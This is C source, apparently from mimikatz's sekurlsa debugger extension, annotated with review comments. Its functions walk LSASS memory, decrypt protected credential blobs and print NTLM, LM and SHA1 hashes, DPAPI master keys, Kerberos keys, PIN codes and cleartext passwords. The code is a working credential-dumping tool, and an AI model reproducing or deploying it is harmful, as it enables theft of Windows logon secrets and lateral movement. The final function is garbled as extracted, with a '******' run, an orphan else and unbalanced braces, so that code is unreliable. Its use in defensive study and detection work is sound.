VOID kuhl_m_sekurlsa_genericKeyOutput(PMARSHALL_KEY key, PVOID * dirtyBase)
{
	/*
	 * Prints one marshalled key and advances the caller's cursor.
	 *
	 * key->unkId selects a label from a fixed tag table (the raw id is printed
	 * in hex when it is not one of the known tags). The payload at *dirtyBase
	 * is laid out as a ULONG byte count followed by the bytes; key->length bytes
	 * after the prefix are hex-dumped, and *dirtyBase is moved past the prefix
	 * plus the prefixed count so a caller can walk consecutive keys.
	 *
	 * Neither key->length nor the ULONG prefix is checked against the other or
	 * against any enclosing buffer size; both are taken as-is from the data.
	 */
	PBYTE blob = (PBYTE) *dirtyBase;

	if(key->unkId == 0x00010002 || key->unkId == 0x00010003)
		dprintf("\n\t * NTLM : ");
	else if(key->unkId == 0x00020002)
		dprintf("\n\t * SHA1 : ");
	else if(key->unkId == 0x00030002 || key->unkId == 0x00030003)
		dprintf("\n\t * RootKey : ");
	else if(key->unkId == 0x00040002 || key->unkId == 0x00040003)
		dprintf("\n\t * DPAPI : ");
	else
		dprintf("\n\t * %08x : ", key->unkId);

	kull_m_string_dprintf_hex(blob + sizeof(ULONG), key->length, 0);

	/* Skip the length prefix and the number of bytes it announces. */
	*dirtyBase = blob + sizeof(ULONG) + *(PULONG) blob;
}
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMasterKeyCacheList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
	/*
	 * Walks the doubly-linked master key cache whose list head lives at
	 * pMasterKeyCacheList in the target, and prints every entry whose LogonId
	 * equals the session's LogonId in pData.
	 *
	 * Every entry is read with ReadMemory; a failed read of the head prints
	 * "KO", a failed read of an entry ends the walk silently. For a matching
	 * entry the key bytes are copied into a LocalAlloc'd buffer, passed through
	 * kuhl_m_sekurlsa_nt6_LsaUnprotectMemory, hex-dumped and freed.
	 *
	 * entry.keySize and the Flink chain come from the target and are not
	 * validated here: a bad keySize only makes LocalAlloc fail (the dump is
	 * skipped), but a corrupted list that never returns to the head is not
	 * bounded by an iteration limit.
	 */
	KIWI_MASTERKEY_CACHE_ENTRY entry;
	ULONG_PTR cursor;
	ULONG index = 0;
	PBYTE keyBuffer;

	/* The head is just a LIST_ENTRY: read only enough to get its Flink. */
	if(!ReadMemory(pMasterKeyCacheList, &entry, sizeof(LIST_ENTRY), NULL))
	{
		dprintf("KO");
		return;
	}

	for(cursor = (ULONG_PTR) entry.Flink; cursor != pMasterKeyCacheList; cursor = (ULONG_PTR) entry.Flink)
	{
		if(!ReadMemory(cursor, &entry, sizeof(KIWI_MASTERKEY_CACHE_ENTRY), NULL))
			break;
		if(!RtlEqualLuid(pData->LogonId, &entry.LogonId))
			continue;

		dprintf("\n\t [%08x]\n\t * GUID :\t", index++);
		kull_m_string_displayGUID(&entry.KeyUid);
		dprintf("\n\t * Time :\t");
		kull_m_string_displayFileTime(&entry.insertTime);

		keyBuffer = (PBYTE) LocalAlloc(LPTR, entry.keySize);
		if(keyBuffer)
		{
			/* The key bytes follow the entry header at the same target address. */
			if(ReadMemory(cursor + FIELD_OFFSET(KIWI_MASTERKEY_CACHE_ENTRY, key), keyBuffer, entry.keySize, NULL))
			{
				kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(keyBuffer, entry.keySize);
				dprintf("\n\t * MasterKey :\t");
				kull_m_string_dprintf_hex(keyBuffer, entry.keySize, 0);
			}
			LocalFree(keyBuffer);
		}
	}
}
/*
 * Prints one credential record of a logon session, in the shape selected by flags:
 *  - KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL: mesCreds is reinterpreted as a
 *    UNICODE_STRING wrapping a blob. The blob is passed through
 *    kuhl_m_sekurlsa_nt6_LsaUnprotectMemory in place (unless NODECRYPT) and then
 *    rendered, according to (flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK),
 *    as an MSV1_0 primary credential, as a list of marshalled keys, or as raw hex.
 *  - KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE: UserName holds the PIN; it is copied,
 *    unprotected and printed.
 *  - KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST: mesCreds is reinterpreted as a
 *    KERB_HASHPASSWORD_6 and its checksum bytes are hex-dumped under the etype name.
 *  - otherwise: UserName / Domaine / Password are copied out, the password is
 *    unprotected, and the triple is printed (tab-separated when DISPLAY_LINE).
 *    DISPLAY_DOMAIN swaps which of UserName/Domaine is shown as the domain.
 *
 * luid is not referenced in this body.
 *
 * Strings obtained through kull_m_string_getDbgUnicodeString are released with
 * LocalFree before returning; presumably that helper replaces .Buffer with a
 * local copy of the target's string — confirm against its definition.
 *
 * NOTE(review): the password-printing statement near the end of the generic
 * branch is garbled in the extracted source (a "******" run, an `else` with no
 * matching `if`, and one more closing brace than opening brace after it). The
 * intended control flow there cannot be recovered from this page; the code is
 * kept as extracted.
 */
VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, PLUID luid, ULONG flags)
{
	PUNICODE_STRING credentials, username = NULL, domain = NULL, password = NULL;
	PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds;
	PRPCE_CREDENTIAL_KEYCREDENTIAL pRpceCredentialKeyCreds;
	PKERB_HASHPASSWORD_6 pHashPassword;
	UNICODE_STRING buffer;
	PVOID base;
	DWORD type, i;

	if(mesCreds)
	{
		if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL)
		{
			type = flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK;
			/* The record itself is a UNICODE_STRING whose Buffer is the credential blob. */
			credentials = (PUNICODE_STRING) mesCreds;
			if(credentials->Buffer)
			{
				/* Decrypt the whole blob in place before any of the typed views below read it. */
				if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
					kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(((PUNICODE_STRING) mesCreds)->Buffer, ((PUNICODE_STRING) mesCreds)->Length);
				switch(type)
				{
				case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY:
					pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL) credentials->Buffer;
					/* The two names are stored relative to the structure; make them absolute before %wZ. */
					kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->UserName, FALSE);
					kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->LogonDomainName, FALSE);
					dprintf("\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds->UserName, &pPrimaryCreds->LogonDomainName);
					/* Each hash is printed only when its presence flag is set. */
					if(pPrimaryCreds->isLmOwfPassword)
					{
						dprintf("\n\t * LM : ");
						kull_m_string_dprintf_hex(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
					}
					if(pPrimaryCreds->isNtOwfPassword)
					{
						dprintf("\n\t * NTLM : ");
						kull_m_string_dprintf_hex(pPrimaryCreds->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
					}
					if(pPrimaryCreds->isShaOwPassword)
					{
						dprintf("\n\t * SHA1 : ");
						kull_m_string_dprintf_hex(pPrimaryCreds->ShaOwPassword, SHA_DIGEST_LENGTH, 0);
					}
					break;
				case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY:
					pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer;
					/*
					 * unk0 is used as the key count. base is placed after the header plus
					 * (unk0 - 1) further MARSHALL_KEY slots, i.e. the header is assumed to
					 * carry one inline key entry; the key payloads are assumed to follow
					 * and are consumed by kuhl_m_sekurlsa_genericKeyOutput, which advances
					 * base. unk0 is not checked against credentials->Length.
					 */
					base = (PBYTE) pRpceCredentialKeyCreds + sizeof(RPCE_CREDENTIAL_KEYCREDENTIAL) + (pRpceCredentialKeyCreds->unk0 - 1) * sizeof(MARSHALL_KEY);
					for (i = 0; i < pRpceCredentialKeyCreds->unk0; i++)
						kuhl_m_sekurlsa_genericKeyOutput(&pRpceCredentialKeyCreds->key[i], &base);
					break;
				default:
					dprintf("\n\t * Raw data : ");
					kull_m_string_dprintf_hex(credentials->Buffer, credentials->Length, 1);
				}
			}
		}
		else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE)
		{
			if(mesCreds->UserName.Buffer)
			{
				if(kull_m_string_getDbgUnicodeString(&mesCreds->UserName))
				{
					/* Here MaximumLength, not Length, is what gets unprotected. */
					if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
						kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(mesCreds->UserName.Buffer, mesCreds->UserName.MaximumLength);
					dprintf("\n\t * PIN code : %wZ", &mesCreds->UserName);
					LocalFree(mesCreds->UserName.Buffer);
				}
			}
		}
		else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST)
		{
			pHashPassword = (PKERB_HASHPASSWORD_6) mesCreds;
			dprintf("\n\t\t%s : ", kuhl_m_kerberos_ticket_etype(pHashPassword->Type));
			/*
			 * Assignment inside the condition (deliberate): Size is truncated to
			 * USHORT for the UNICODE_STRING, so a Size that is a multiple of 0x10000
			 * becomes 0 and is reported as "no size" rather than dumped.
			 */
			if(buffer.Length = buffer.MaximumLength = (USHORT) pHashPassword->Size)
			{
				buffer.Buffer = (PWSTR) pHashPassword->Checksump;
				if(kull_m_string_getDbgUnicodeString(&buffer))
				{
					if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
						kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(buffer.Buffer, buffer.MaximumLength);
					kull_m_string_dprintf_hex(buffer.Buffer, buffer.Length, 0);
					LocalFree(buffer.Buffer);
				}
			}
			else dprintf("<no size, buffer is incorrect>");
		}
		else
		{
			if(mesCreds->UserName.Buffer || mesCreds->Domaine.Buffer || mesCreds->Password.Buffer)
			{
				/* A field is shown only if it was copied out AND looks like printable Unicode. */
				if(kull_m_string_getDbgUnicodeString(&mesCreds->UserName) && kull_m_string_suspectUnicodeString(&mesCreds->UserName))
				{
					if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN))
						username = &mesCreds->UserName;
					else domain = &mesCreds->UserName;
				}
				if(kull_m_string_getDbgUnicodeString(&mesCreds->Domaine) && kull_m_string_suspectUnicodeString(&mesCreds->Domaine))
				{
					if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN))
						domain = &mesCreds->Domaine;
					else username = &mesCreds->Domaine;
				}
				/* The password is not subjected to the printable-Unicode test (that check is commented out). */
				if(kull_m_string_getDbgUnicodeString(&mesCreds->Password) /*&& !kull_m_string_suspectUnicodeString(&mesCreds->Password)*/)
				{
					if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
						kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(mesCreds->Password.Buffer, mesCreds->Password.MaximumLength);
					password = &mesCreds->Password;
				}
				/* WPASSONLY suppresses records that have no password. */
				if(password || !(flags & KUHL_SEKURLSA_CREDS_DISPLAY_WPASSONLY))
				{
					/*
					 * NOTE(review): garbled as extracted — see the header comment. As written,
					 * password is dereferenced on a path where it may still be NULL.
					 */
					dprintf((flags & KUHL_SEKURLSA_CREDS_DISPLAY_LINE) ? "%wZ\t%wZ\t" : "\n\t * Username : %wZ" "\n\t * Domain : %wZ" "\n\t * Password : "******"%.*S", password->Length / sizeof(wchar_t), password->Buffer);
					else dprintf("%wZ", password ? password : &uNull);
				}
				else kull_m_string_dprintf_hex(password->Buffer, password->Length, 1);
			}
			/* Release the copies made by kull_m_string_getDbgUnicodeString (LocalFree(NULL) is a no-op). */
			LocalFree(mesCreds->UserName.Buffer);
			LocalFree(mesCreds->Domaine.Buffer);
			LocalFree(mesCreds->Password.Buffer);
		}
	}
	/* NOTE(review): brace nesting below is as extracted and does not balance with the opening braces above. */
	if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NEWLINE)
		dprintf("\n");
	}
	else dprintf("LUID KO\n");
}